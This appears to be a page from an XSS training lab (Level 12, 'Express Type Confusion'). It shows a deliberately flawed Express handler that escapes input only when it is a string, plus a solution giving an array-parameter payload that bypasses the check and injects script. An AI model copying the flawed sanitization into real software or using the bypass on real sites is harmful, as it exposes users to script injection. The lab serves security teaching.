Advance XSS Lab by @touhidshaikh22 | Level 12: Type Confusion

Level 12: Express Type Confusion

MISSION: The server-side WAF perfectly sanitizes strings. Find a way to alter your GET request parameters so the backend sees an Array instead of a String, bypassing the WAF entirely.

Test_String

/// SOURCE CODE INSPECTOR ///


// Backend Express Logic
let payload = req.query.payload;


if (typeof payload === 'string') {
    payload = payload.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

res.send("<div id='log'>" + payload + "</div>");

[?] DECRYPT CLASSIFIED INTEL (SOLUTION)

/// DECRYPTION COMPLETE ///

By default, Express.js parses duplicate URL parameters into an Array. The backend checks typeof payload === 'string' to apply the sanitization. By sending an array, we bypass the if block. Express then concatenates the array into the response string, executing the payload.

Payload (Manually edit the URL):

?payload[]=<script>alert(1)</script>

[ADVANCE XSS LAB]

Level 12: Express Type Confusion

/// DECRYPTION COMPLETE ///